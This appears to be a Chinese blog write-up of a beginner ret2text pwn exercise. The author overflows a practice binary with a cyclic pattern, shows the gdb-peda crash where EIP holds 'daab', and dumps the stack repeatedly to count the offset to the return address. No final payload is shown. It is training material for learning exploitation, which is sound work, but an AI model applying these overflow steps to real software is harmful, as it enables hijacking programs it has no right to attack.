pwn,获取系统权限,入门题,cyclic

最新推荐文章于 2024-05-14 20:10:52 发布
最新推荐文章于 2024-05-14 20:10:52 发布
阅读量3.4k 收藏
点赞数
分类专栏: 安全 文章标签: pwn 安全 入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42072280/article/details/90341625
版权

https://blog.csdn.net/SanOrintea/article/details/82288959

大部分还是按照这个来的,就是关于数前面有多少个字符的时候,这个博客是用cyclic -l来数的,但是我在gdb中运行这个命令的时候显示有错误,

我觉得可能是因为那个博客是pwndbg,我是gdb-peda,所以,我就是列了这200个字符的规律,数了一下,当然按照下面x/200xw这种方法也可以数出来

 

在ida中

search->text  找到地址

也可以在左边直接找main

 

 

ningan@ubuntu:~/anan/test$ ./ret2text
There is something amazing here, do you know anything?
123456
Maybe I will tell you next time !ningan@ubuntu:~/anan/test$ 
ningan@ubuntu:~/anan/test$

ningan@ubuntu:~/anan/test$ cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
ningan@ubuntu:~/anan/test$ 
ningan@ubuntu:~/anan/test$ gdb -q ret2text
Traceback (most recent call last):
  File "/home/ningan/pwndbg/gdbinit.py", line 36, in <module>
    import pwndbg # isort:skip
  File "/home/ningan/pwndbg/pwndbg/__init__.py", line 19, in <module>
    import pwndbg.commands.aslr
  File "/home/ningan/pwndbg/pwndbg/commands/aslr.py", line 24, in <module>
    def aslr(state=None):
  File "/home/ningan/pwndbg/pwndbg/commands/__init__.py", line 298, in __call__
    return _ArgparsedCommand(self.parser, function)
  File "/home/ningan/pwndbg/pwndbg/commands/__init__.py", line 267, in __init__
    super(_ArgparsedCommand, self).__init__(function, command_name=command_name, *a, **kw)
  File "/home/ningan/pwndbg/pwndbg/commands/__init__.py", line 61, in __init__
    raise Exception('Cannot override non-whitelisted built-in command "%s"' % command_name)
Exception: Cannot override non-whitelisted built-in command "aslr"
Reading symbols from ret2text...done.
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
gdb-peda$ run
Starting program: /home/ningan/anan/test/ret2text 
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
There is something amazing here, do you know anything?
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
Maybe I will tell you next time !
Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0xf7fbc000 --> 0x1acda8 
ECX: 0x21 ('!')
EDX: 0xf7fbd898 --> 0x0 
ESI: 0x0 
EDI: 0x0 
EBP: 0x62616163 ('caab')
ESP: 0xffffd140 ("eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
EIP: 0x62616164 ('daab')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x62616164
[------------------------------------stack-------------------------------------]
0000| 0xffffd140 ("eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0004| 0xffffd144 ("faabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0008| 0xffffd148 ("gaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0012| 0xffffd14c ("haabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0016| 0xffffd150 ("iaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0020| 0xffffd154 ("jaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0024| 0xffffd158 ("kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0028| 0xffffd15c ("laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x62616164 in ?? ()
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
gdb-peda$ x/200xw 0xffffd140
0xffffd140:    0x62616165    0x62616166    0x62616167    0x62616168
0xffffd150:    0x62616169    0x6261616a    0x6261616b    0x6261616c
0xffffd160:    0x6261616d    0x6261616e    0x6261616f    0x62616170
0xffffd170:    0x62616171    0x62616172    0x62616173    0x62616174
0xffffd180:    0x62616175    0x62616176    0x62616177    0x62616178
0xffffd190:    0x62616179    0xf7ff0600    0xf7e28a09    0xf7ffd000
0xffffd1a0:    0x00000001    0x08048500    0x00000000    0x08048521
0xffffd1b0:    0x08048648    0x00000001    0xffffd1d4    0x080486d0
0xffffd1c0:    0x08048740    0xf7feb300    0xffffd1cc    0x0000001c
0xffffd1d0:    0x00000001    0xffffd392    0x00000000    0xffffd3b2
0xffffd1e0:    0xffffd3bd    0xffffd3cf    0xffffd401    0xffffd412
0xffffd1f0:    0xffffd428    0xffffd45d    0xffffd46e    0xffffd47e
0xffffd200:    0xffffd489    0xffffd49b    0xffffd4cf    0xffffd513
0xffffd210:    0xffffd542    0xffffd54e    0xffffda6f    0xffffdaa9
0xffffd220:    0xffffdadd    0xffffdb0d    0xffffdb40    0xffffdb4c
0xffffd230:    0xffffdb90    0xffffdba7    0xffffdc05    0xffffdc14
0xffffd240:    0xffffdc35    0xffffdc47    0xffffdc62    0xffffdc74
0xffffd250:    0xffffdc88    0xffffdc99    0xffffdcb0    0xffffdce6
0xffffd260:    0xffffdcf5    0xffffdd12    0xffffdd24    0xffffdd2d
0xffffd270:    0xffffdd3f    0xffffdd59    0xffffdd61    0xffffdd70
0xffffd280:    0xffffdd82    0xffffdd91    0xffffddbd    0xffffddcf
0xffffd290:    0xffffddde    0xffffddfe    0xffffde3a    0xffffde89
0xffffd2a0:    0xffffde9b    0xffffdebb    0xffffded0    0xffffdef2
0xffffd2b0:    0xffffdf01    0xffffdf0c    0xffffdf2b    0xffffdf3e
0xffffd2c0:    0xffffdf58    0xffffdf7a    0xffffdf9b    0xffffdfbf
0xffffd2d0:    0x00000000    0x00000020    0xf7fdacd0    0x00000021
0xffffd2e0:    0xf7fda000    0x00000010    0x078bfbff    0x00000006
0xffffd2f0:    0x00001000    0x00000011    0x00000064    0x00000003
0xffffd300:    0x08048034    0x00000004    0x00000020    0x00000005
0xffffd310:    0x00000009    0x00000007    0xf7fdc000    0x00000008
0xffffd320:    0x00000000    0x00000009    0x08048500    0x0000000b
0xffffd330:    0x000003e8    0x0000000c    0x000003e8    0x0000000d
0xffffd340:    0x000003e8    0x0000000e    0x000003e8    0x00000017
0xffffd350:    0x00000000    0x00000019    0xffffd37b    0x0000001f
0xffffd360:    0xffffdfd8    0x0000000f    0xffffd38b    0x00000000
0xffffd370:    0x00000000    0x00000000    0x10000000    0x2235c85a
0xffffd380:    0x26079adc    0xd3edc5de    0x69c74ecd    0x00363836
0xffffd390:    0x682f0000    0x2f656d6f    0x676e696e    0x612f6e61
0xffffd3a0:    0x2f6e616e    0x74736574    0x7465722f    0x78657432
0xffffd3b0:    0x44580074    0x54565f47    0x373d524e    0x47445800
0xffffd3c0:    0x5345535f    0x4e4f4953    0x3d44495f    0x58003263
0xffffd3d0:    0x475f4744    0x54454552    0x445f5245    0x5f415441
0xffffd3e0:    0x3d524944    0x7261762f    0x62696c2f    0x67696c2f
0xffffd3f0:    0x6d647468    0x7461642d    0x696e2f61    0x6e61676e
0xffffd400:    0x4c455300    0x58554e49    0x494e495f    0x45593d54
0xffffd410:    0x4c430053    0x45545455    0x4d495f52    0x444f4d5f
0xffffd420:    0x3d454c55    0x006d6978    0x5f475047    0x4e454741
0xffffd430:    0x4e495f54    0x2f3d4f46    0x2f6e7572    0x72657375
0xffffd440:    0x3030312f    0x656b2f30    0x6e697279    0x6a4d2d67
0xffffd450:    0x41757347    0x6770672f    0x313a303a    0x45545600
gdb-peda$ x/200xw 0xffffd120
0xffffd120:    0x61616176    0x61616177    0x61616178    0x61616179
0xffffd130:    0x6261617a    0x62616162    0x62616163    0x62616164
0xffffd140:    0x62616165    0x62616166    0x62616167    0x62616168
0xffffd150:    0x62616169    0x6261616a    0x6261616b    0x6261616c
0xffffd160:    0x6261616d    0x6261616e    0x6261616f    0x62616170
0xffffd170:    0x62616171    0x62616172    0x62616173    0x62616174
0xffffd180:    0x62616175    0x62616176    0x62616177    0x62616178
0xffffd190:    0x62616179    0xf7ff0600    0xf7e28a09    0xf7ffd000
0xffffd1a0:    0x00000001    0x08048500    0x00000000    0x08048521
0xffffd1b0:    0x08048648    0x00000001    0xffffd1d4    0x080486d0
0xffffd1c0:    0x08048740    0xf7feb300    0xffffd1cc    0x0000001c
0xffffd1d0:    0x00000001    0xffffd392    0x00000000    0xffffd3b2
0xffffd1e0:    0xffffd3bd    0xffffd3cf    0xffffd401    0xffffd412
0xffffd1f0:    0xffffd428    0xffffd45d    0xffffd46e    0xffffd47e
0xffffd200:    0xffffd489    0xffffd49b    0xffffd4cf    0xffffd513
0xffffd210:    0xffffd542    0xffffd54e    0xffffda6f    0xffffdaa9
0xffffd220:    0xffffdadd    0xffffdb0d    0xffffdb40    0xffffdb4c
0xffffd230:    0xffffdb90    0xffffdba7    0xffffdc05    0xffffdc14
0xffffd240:    0xffffdc35    0xffffdc47    0xffffdc62    0xffffdc74
0xffffd250:    0xffffdc88    0xffffdc99    0xffffdcb0    0xffffdce6
0xffffd260:    0xffffdcf5    0xffffdd12    0xffffdd24    0xffffdd2d
0xffffd270:    0xffffdd3f    0xffffdd59    0xffffdd61    0xffffdd70
0xffffd280:    0xffffdd82    0xffffdd91    0xffffddbd    0xffffddcf
0xffffd290:    0xffffddde    0xffffddfe    0xffffde3a    0xffffde89
0xffffd2a0:    0xffffde9b    0xffffdebb    0xffffded0    0xffffdef2
0xffffd2b0:    0xffffdf01    0xffffdf0c    0xffffdf2b    0xffffdf3e
0xffffd2c0:    0xffffdf58    0xffffdf7a    0xffffdf9b    0xffffdfbf
0xffffd2d0:    0x00000000    0x00000020    0xf7fdacd0    0x00000021
0xffffd2e0:    0xf7fda000    0x00000010    0x078bfbff    0x00000006
0xffffd2f0:    0x00001000    0x00000011    0x00000064    0x00000003
0xffffd300:    0x08048034    0x00000004    0x00000020    0x00000005
0xffffd310:    0x00000009    0x00000007    0xf7fdc000    0x00000008
0xffffd320:    0x00000000    0x00000009    0x08048500    0x0000000b
0xffffd330:    0x000003e8    0x0000000c    0x000003e8    0x0000000d
0xffffd340:    0x000003e8    0x0000000e    0x000003e8    0x00000017
0xffffd350:    0x00000000    0x00000019    0xffffd37b    0x0000001f
0xffffd360:    0xffffdfd8    0x0000000f    0xffffd38b    0x00000000
0xffffd370:    0x00000000    0x00000000    0x10000000    0x2235c85a
0xffffd380:    0x26079adc    0xd3edc5de    0x69c74ecd    0x00363836
0xffffd390:    0x682f0000    0x2f656d6f    0x676e696e    0x612f6e61
0xffffd3a0:    0x2f6e616e    0x74736574    0x7465722f    0x78657432
0xffffd3b0:    0x44580074    0x54565f47    0x373d524e    0x47445800
0xffffd3c0:    0x5345535f    0x4e4f4953    0x3d44495f    0x58003263
0xffffd3d0:    0x475f4744    0x54454552    0x445f5245    0x5f415441
0xffffd3e0:    0x3d524944    0x7261762f    0x62696c2f    0x67696c2f
0xffffd3f0:    0x6d647468    0x7461642d    0x696e2f61    0x6e61676e
0xffffd400:    0x4c455300    0x58554e49    0x494e495f    0x45593d54
0xffffd410:    0x4c430053    0x45545455    0x4d495f52    0x444f4d5f
0xffffd420:    0x3d454c55    0x006d6978    0x5f475047    0x4e454741
0xffffd430:    0x4e495f54    0x2f3d4f46    0x2f6e7572    0x72657375
gdb-peda$ p *0xffffd13c
$1 = 0x62616164
gdb-peda$ x/200xw 0xffffd100
0xffffd100:    0x6161616e    0x6161616f    0x61616170    0x61616171
0xffffd110:    0x61616172    0x61616173    0x61616174    0x61616175
0xffffd120:    0x61616176    0x61616177    0x61616178    0x61616179
0xffffd130:    0x6261617a    0x62616162    0x62616163    0x62616164
0xffffd140:    0x62616165    0x62616166    0x62616167    0x62616168
0xffffd150:    0x62616169    0x6261616a    0x6261616b    0x6261616c
0xffffd160:    0x6261616d    0x6261616e    0x6261616f    0x62616170
0xffffd170:    0x62616171    0x62616172    0x62616173    0x62616174
0xffffd180:    0x62616175    0x62616176    0x62616177    0x62616178
0xffffd190:    0x62616179    0xf7ff0600    0xf7e28a09    0xf7ffd000
0xffffd1a0:    0x00000001    0x08048500    0x00000000    0x08048521
0xffffd1b0:    0x08048648    0x00000001    0xffffd1d4    0x080486d0
0xffffd1c0:    0x08048740    0xf7feb300    0xffffd1cc    0x0000001c
0xffffd1d0:    0x00000001    0xffffd392    0x00000000    0xffffd3b2
0xffffd1e0:    0xffffd3bd    0xffffd3cf    0xffffd401    0xffffd412
0xffffd1f0:    0xffffd428    0xffffd45d    0xffffd46e    0xffffd47e
0xffffd200:    0xffffd489    0xffffd49b    0xffffd4cf    0xffffd513
0xffffd210:    0xffffd542    0xffffd54e    0xffffda6f    0xffffdaa9
0xffffd220:    0xffffdadd    0xffffdb0d    0xffffdb40    0xffffdb4c
0xffffd230:    0xffffdb90    0xffffdba7    0xffffdc05    0xffffdc14
0xffffd240:    0xffffdc35    0xffffdc47    0xffffdc62    0xffffdc74
0xffffd250:    0xffffdc88    0xffffdc99    0xffffdcb0    0xffffdce6
0xffffd260:    0xffffdcf5    0xffffdd12    0xffffdd24    0xffffdd2d
0xffffd270:    0xffffdd3f    0xffffdd59    0xffffdd61    0xffffdd70
0xffffd280:    0xffffdd82    0xffffdd91    0xffffddbd    0xffffddcf
0xffffd290:    0xffffddde    0xffffddfe    0xffffde3a    0xffffde89
0xffffd2a0:    0xffffde9b    0xffffdebb    0xffffded0    0xffffdef2
0xffffd2b0:    0xffffdf01    0xffffdf0c    0xffffdf2b    0xffffdf3e
0xffffd2c0:    0xffffdf58    0xffffdf7a    0xffffdf9b    0xffffdfbf
0xffffd2d0:    0x00000000    0x00000020    0xf7fdacd0    0x00000021
0xffffd2e0:    0xf7fda000    0x00000010    0x078bfbff    0x00000006
0xffffd2f0:    0x00001000    0x00000011    0x00000064    0x00000003
0xffffd300:    0x08048034    0x00000004    0x00000020    0x00000005
0xffffd310:    0x00000009    0x00000007    0xf7fdc000    0x00000008
0xffffd320:    0x00000000    0x00000009    0x08048500    0x0000000b
0xffffd330:    0x000003e8    0x0000000c    0x000003e8    0x0000000d
0xffffd340:    0x000003e8    0x0000000e    0x000003e8    0x00000017
0xffffd350:    0x00000000    0x00000019    0xffffd37b    0x0000001f
0xffffd360:    0xffffdfd8    0x0000000f    0xffffd38b    0x00000000
0xffffd370:    0x00000000    0x00000000    0x10000000    0x2235c85a
0xffffd380:    0x26079adc    0xd3edc5de    0x69c74ecd    0x00363836
0xffffd390:    0x682f0000    0x2f656d6f    0x676e696e    0x612f6e61
0xffffd3a0:    0x2f6e616e    0x74736574    0x7465722f    0x78657432
0xffffd3b0:    0x44580074    0x54565f47    0x373d524e    0x47445800
0xffffd3c0:    0x5345535f    0x4e4f4953    0x3d44495f    0x58003263
0xffffd3d0:    0x475f4744    0x54454552    0x445f5245    0x5f415441
0xffffd3e0:    0x3d524944    0x7261762f    0x62696c2f    0x67696c2f
0xffffd3f0:    0x6d647468    0x7461642d    0x696e2f61    0x6e61676e
0xffffd400:    0x4c455300    0x58554e49    0x494e495f    0x45593d54
0xffffd410:    0x4c430053    0x45545455    0x4d495f52    0x444f4d5f
gdb-peda$ x/200xw 0xffffd0f0
0xffffd0f0:    0x6161616a    0x6161616b    0x6161616c    0x6161616d
0xffffd100:    0x6161616e    0x6161616f    0x61616170    0x61616171
0xffffd110:    0x61616172    0x61616173    0x61616174    0x61616175
0xffffd120:    0x61616176    0x61616177    0x61616178    0x61616179
0xffffd130:    0x6261617a    0x62616162    0x62616163    0x62616164
0xffffd140:    0x62616165    0x62616166    0x62616167    0x62616168
0xffffd150:    0x62616169    0x6261616a    0x6261616b    0x6261616c
0xffffd160:    0x6261616d    0x6261616e    0x6261616f    0x62616170
0xffffd170:    0x62616171    0x62616172    0x62616173    0x62616174
0xffffd180:    0x62616175    0x62616176    0x62616177    0x62616178
0xffffd190:    0x62616179    0xf7ff0600    0xf7e28a09    0xf7ffd000
0xffffd1a0:    0x00000001    0x08048500    0x00000000    0x08048521
0xffffd1b0:    0x08048648    0x00000001    0xffffd1d4    0x080486d0
0xffffd1c0:    0x08048740    0xf7feb300    0xffffd1cc    0x0000001c
0xffffd1d0:    0x00000001    0xffffd392    0x00000000    0xffffd3b2
0xffffd1e0:    0xffffd3bd    0xffffd3cf    0xffffd401    0xffffd412
0xffffd1f0:    0xffffd428    0xffffd45d    0xffffd46e    0xffffd47e
0xffffd200:    0xffffd489    0xffffd49b    0xffffd4cf    0xffffd513
0xffffd210:    0xffffd542    0xffffd54e    0xffffda6f    0xffffdaa9
0xffffd220:    0xffffdadd    0xffffdb0d    0xffffdb40    0xffffdb4c
0xffffd230:    0xffffdb90    0xffffdba7    0xffffdc05    0xffffdc14
0xffffd240:    0xffffdc35    0xffffdc47    0xffffdc62    0xffffdc74
0xffffd250:    0xffffdc88    0xffffdc99    0xffffdcb0    0xffffdce6
0xffffd260:    0xffffdcf5    0xffffdd12    0xffffdd24    0xffffdd2d
0xffffd270:    0xffffdd3f    0xffffdd59    0xffffdd61    0xffffdd70
0xffffd280:    0xffffdd82    0xffffdd91    0xffffddbd    0xffffddcf
0xffffd290:    0xffffddde    0xffffddfe    0xffffde3a    0xffffde89
0xffffd2a0:    0xffffde9b    0xffffdebb    0xffffded0    0xffffdef2
0xffffd2b0:    0xffffdf01    0xffffdf0c    0xffffdf2b    0xffffdf3e
0xffffd2c0:    0xffffdf58    0xffffdf7a    0xffffdf9b    0xffffdfbf
0xffffd2d0:    0x00000000    0x00000020    0xf7fdacd0    0x00000021
0xffffd2e0:    0xf7fda000    0x00000010    0x078bfbff    0x00000006
0xffffd2f0:    0x00001000    0x00000011    0x00000064    0x00000003
0xffffd300:    0x08048034    0x00000004    0x00000020    0x00000005
0xffffd310:    0x00000009    0x00000007    0xf7fdc000    0x00000008
0xffffd320:    0x00000000    0x00000009    0x08048500    0x0000000b
0xffffd330:    0x000003e8    0x0000000c    0x000003e8    0x0000000d
0xffffd340:    0x000003e8    0x0000000e    0x000003e8    0x00000017
0xffffd350:    0x00000000    0x00000019    0xffffd37b    0x0000001f
0xffffd360:    0xffffdfd8    0x0000000f    0xffffd38b    0x00000000
0xffffd370:    0x00000000    0x00000000    0x10000000    0x2235c85a
0xffffd380:    0x26079adc    0xd3edc5de    0x69c74ecd    0x00363836
0xffffd390:    0x682f0000    0x2f656d6f    0x676e696e    0x612f6e61
0xffffd3a0:    0x2f6e616e    0x74736574    0x7465722f    0x78657432
0xffffd3b0:    0x44580074    0x54565f47    0x373d524e    0x47445800
0xffffd3c0:    0x5345535f    0x4e4f4953    0x3d44495f    0x58003263
0xffffd3d0:    0x475f4744    0x54454552    0x445f5245    0x5f415441
0xffffd3e0:    0x3d524944    0x7261762f    0x62696c2f    0x67696c2f
0xffffd3f0:    0x6d647468    0x7461642d    0x696e2f61    0x6e61676e
0xffffd400:    0x4c455300    0x58554e49    0x494e495f    0x45593d54
gdb-peda$ x/200xw 0xffffd0d0
0xffffd0d0:    0x61616162    0x61616163    0x61616164    0x61616165
0xffffd0e0:    0x61616166    0x61616167    0x61616168    0x61616169
0xffffd0f0:    0x6161616a    0x6161616b    0x6161616c    0x6161616d
0xffffd100:    0x6161616e    0x6161616f    0x61616170    0x61616171
0xffffd110:    0x61616172    0x61616173    0x61616174    0x61616175
0xffffd120:    0x61616176    0x61616177    0x61616178    0x61616179
0xffffd130:    0x6261617a    0x62616162    0x62616163    0x62616164
0xffffd140:    0x62616165    0x62616166    0x62616167    0x62616168
0xffffd150:    0x62616169    0x6261616a    0x6261616b    0x6261616c
0xffffd160:    0x6261616d    0x6261616e    0x6261616f    0x62616170
0xffffd170:    0x62616171    0x62616172    0x62616173    0x62616174
0xffffd180:    0x62616175    0x62616176    0x62616177    0x62616178
0xffffd190:    0x62616179    0xf7ff0600    0xf7e28a09    0xf7ffd000
0xffffd1a0:    0x00000001    0x08048500    0x00000000    0x08048521
0xffffd1b0:    0x08048648    0x00000001    0xffffd1d4    0x080486d0
0xffffd1c0:    0x08048740    0xf7feb300    0xffffd1cc    0x0000001c
0xffffd1d0:    0x00000001    0xffffd392    0x00000000    0xffffd3b2
0xffffd1e0:    0xffffd3bd    0xffffd3cf    0xffffd401    0xffffd412
0xffffd1f0:    0xffffd428    0xffffd45d    0xffffd46e    0xffffd47e
0xffffd200:    0xffffd489    0xffffd49b    0xffffd4cf    0xffffd513
0xffffd210:    0xffffd542    0xffffd54e    0xffffda6f    0xffffdaa9
0xffffd220:    0xffffdadd    0xffffdb0d    0xffffdb40    0xffffdb4c
0xffffd230:    0xffffdb90    0xffffdba7    0xffffdc05    0xffffdc14
0xffffd240:    0xffffdc35    0xffffdc47    0xffffdc62    0xffffdc74
0xffffd250:    0xffffdc88    0xffffdc99    0xffffdcb0    0xffffdce6
0xffffd260:    0xffffdcf5    0xffffdd12    0xffffdd24    0xffffdd2d
0xffffd270:    0xffffdd3f    0xffffdd59    0xffffdd61    0xffffdd70
0xffffd280:    0xffffdd82    0xffffdd91    0xffffddbd    0xffffddcf
0xffffd290:    0xffffddde    0xffffddfe    0xffffde3a    0xffffde89
0xffffd2a0:    0xffffde9b    0xffffdebb    0xffffded0    0xffffdef2
0xffffd2b0:    0xffffdf01    0xffffdf0c    0xffffdf2b    0xffffdf3e
0xffffd2c0:    0xffffdf58    0xffffdf7a    0xffffdf9b    0xffffdfbf
0xffffd2d0:    0x00000000    0x00000020    0xf7fdacd0    0x00000021
0xffffd2e0:    0xf7fda000    0x00000010    0x078bfbff    0x00000006
0xffffd2f0:    0x00001000    0x00000011    0x00000064    0x00000003
0xffffd300:    0x08048034    0x00000004    0x00000020    0x00000005
0xffffd310:    0x00000009    0x00000007    0xf7fdc000    0x00000008
0xffffd320:    0x00000000    0x00000009    0x08048500    0x0000000b
0xffffd330:    0x000003e8    0x0000000c    0x000003e8    0x0000000d
0xffffd340:    0x000003e8    0x0000000e    0x000003e8    0x00000017
0xffffd350:    0x00000000    0x00000019    0xffffd37b    0x0000001f
0xffffd360:    0xffffdfd8    0x0000000f    0xffffd38b    0x00000000
0xffffd370:    0x00000000    0x00000000    0x10000000    0x2235c85a
0xffffd380:    0x26079adc    0xd3edc5de    0x69c74ecd    0x00363836
0xffffd390:    0x682f0000    0x2f656d6f    0x676e696e    0x612f6e61
0xffffd3a0:    0x2f6e616e    0x74736574    0x7465722f    0x78657432
0xffffd3b0:    0x44580074    0x54565f47    0x373d524e    0x47445800
0xffffd3c0:    0x5345535f    0x4e4f4953    0x3d44495f    0x58003263
0xffffd3d0:    0x475f4744    0x54454552    0x445f5245    0x5f415441
0xffffd3e0:    0x3d524944    0x7261762f    0x62696c2f    0x67696c2f
gdb-peda$ x/200xw 0xffffd0c0
0xffffd0c0:    0xffffd174    0xffffd0e8    0xffffd0e0    0x61616161
0xffffd0d0:    0x61616162    0x61616163    0x61616164    0x61616165
0xffffd0e0:    0x61616166    0x61616167    0x61616168    0x61616169
0xffffd0f0:    0x6161616a    0x6161616b    0x6161616c    0x6161616d
0xffffd100:    0x6161616e    0x6161616f    0x61616170    0x61616171
0xffffd110:    0x61616172    0x61616173    0x61616174    0x61616175
0xffffd120:    0x61616176    0x61616177    0x61616178    0x61616179
0xffffd130:    0x6261617a    0x62616162    0x62616163    0x62616164
0xffffd140:    0x62616165    0x62616166    0x62616167    0x62616168
0xffffd150:    0x62616169    0x6261616a    0x6261616b    0x6261616c
0xffffd160:    0x6261616d    0x6261616e    0x6261616f    0x62616170
0xffffd170:    0x62616171    0x62616172    0x62616173    0x62616174
0xffffd180:    0x62616175    0x62616176    0x62616177    0x62616178
0xffffd190:    0x62616179    0xf7ff0600    0xf7e28a09    0xf7ffd000
0xffffd1a0:    0x00000001    0x08048500    0x00000000    0x08048521
0xffffd1b0:    0x08048648    0x00000001    0xffffd1d4    0x080486d0
0xffffd1c0:    0x08048740    0xf7feb300    0xffffd1cc    0x0000001c
0xffffd1d0:    0x00000001    0xffffd392    0x00000000    0xffffd3b2
0xffffd1e0:    0xffffd3bd    0xffffd3cf    0xffffd401    0xffffd412
0xffffd1f0:    0xffffd428    0xffffd45d    0xffffd46e    0xffffd47e
0xffffd200:    0xffffd489    0xffffd49b    0xffffd4cf    0xffffd513
0xffffd210:    0xffffd542    0xffffd54e    0xffffda6f    0xffffdaa9
0xffffd220:    0xffffdadd    0xffffdb0d    0xffffdb40    0xffffdb4c
0xffffd230:    0xffffdb90    0xffffdba7    0xffffdc05    0xffffdc14
0xffffd240:    0xffffdc35    0xffffdc47    0xffffdc62    0xffffdc74
0xffffd250:    0xffffdc88    0xffffdc99    0xffffdcb0    0xffffdce6
0xffffd260:    0xffffdcf5    0xffffdd12    0xffffdd24    0xffffdd2d
0xffffd270:    0xffffdd3f    0xffffdd59    0xffffdd61    0xffffdd70
0xffffd280:    0xffffdd82    0xffffdd91    0xffffddbd    0xffffddcf
0xffffd290:    0xffffddde    0xffffddfe    0xffffde3a    0xffffde89
0xffffd2a0:    0xffffde9b    0xffffdebb    0xffffded0    0xffffdef2
0xffffd2b0:    0xffffdf01    0xffffdf0c    0xffffdf2b    0xffffdf3e
0xffffd2c0:    0xffffdf58    0xffffdf7a    0xffffdf9b    0xffffdfbf
0xffffd2d0:    0x00000000    0x00000020    0xf7fdacd0    0x00000021
0xffffd2e0:    0xf7fda000    0x00000010    0x078bfbff    0x00000006
0xffffd2f0:    0x00001000    0x00000011    0x00000064    0x00000003
0xffffd300:    0x08048034    0x00000004    0x00000020    0x00000005
0xffffd310:    0x00000009    0x00000007    0xf7fdc000    0x00000008
0xffffd320:    0x00000000    0x00000009    0x08048500    0x0000000b
0xffffd330:    0x000003e8    0x0000000c    0x000003e8    0x0000000d
0xffffd340:    0x000003e8    0x0000000e    0x000003e8    0x00000017
0xffffd350:    0x00000000    0x00000019    0xffffd37b    0x0000001f
0xffffd360:    0xffffdfd8    0x0000000f    0xffffd38b    0x00000000
0xffffd370:    0x00000000    0x00000000    0x10000000    0x2235c85a
0xffffd380:    0x26079adc    0xd3edc5de    0x69c74ecd    0x00363836
0xffffd390:    0x682f0000    0x2f656d6f    0x676e696e    0x612f6e61
0xffffd3a0:    0x2f6e616e    0x74736574    0x7465722f    0x78657432
0xffffd3b0:    0x44580074    0x54565f47    0x373d524e    0x47445800
0xffffd3c0:    0x5345535f    0x4e4f4953    0x3d44495f    0x58003263
0xffffd3d0:    0x475f4744    0x54454552    0x445f5245    0x5f415441
gdb-peda$ 
0xffffd3e0:    0x3d524944    0x7261762f    0x62696c2f    0x67696c2f
0xffffd3f0:    0x6d647468    0x7461642d    0x696e2f61    0x6e61676e
0xffffd400:    0x4c455300    0x58554e49    0x494e495f    0x45593d54
0xffffd410:    0x4c430053    0x45545455    0x4d495f52    0x444f4d5f
0xffffd420:    0x3d454c55    0x006d6978    0x5f475047    0x4e454741
0xffffd430:    0x4e495f54    0x2f3d4f46    0x2f6e7572    0x72657375
0xffffd440:    0x3030312f    0x656b2f30    0x6e697279    0x6a4d2d67
0xffffd450:    0x41757347    0x6770672f    0x313a303a    0x45545600
0xffffd460:    0x5245565f    0x4e4f4953    0x3034333d    0x48530039
0xffffd470:    0x3d4c4c45    0x6e69622f    0x7361622f    0x45540068
0xffffd480:    0x783d4d52    0x6d726574    0x4e495700    0x49574f44
0xffffd490:    0x30363d44    0x34323238    0x47003231    0x454d4f4e
0xffffd4a0:    0x59454b5f    0x474e4952    0x4e4f435f    0x4c4f5254
0xffffd4b0:    0x75722f3d    0x73752f6e    0x312f7265    0x2f303030
0xffffd4c0:    0x7279656b    0x2d676e69    0x73476a4d    0x55004175
0xffffd4d0:    0x41545350    0x535f5452    0x49535345    0x753d4e4f
0xffffd4e0:    0x3a78696e    0x74736261    0x74636172    0x6f632f3d
0xffffd4f0:    0x62752f6d    0x75746e75    0x7370752f    0x74726174
0xffffd500:    0x7365732d    0x6e6f6973    0x3030312f    0x31322f30
0xffffd510:    0x47003533    0x4d5f4b54    0x4c55444f    0x6f3d5345
0xffffd520:    0x6c726576    0x732d7961    0x6c6f7263    0x7261626c
0xffffd530:    0x696e753a    0x672d7974    0x6d2d6b74    0x6c75646f
0xffffd540:    0x53550065    0x6e3d5245    0x61676e69    0x534c006e
0xffffd550:    0x4c4f435f    0x3d53524f    0x303d7372    0x3d69643a
0xffffd560:    0x333b3130    0x6e6c3a34    0x3b31303d    0x6d3a3633
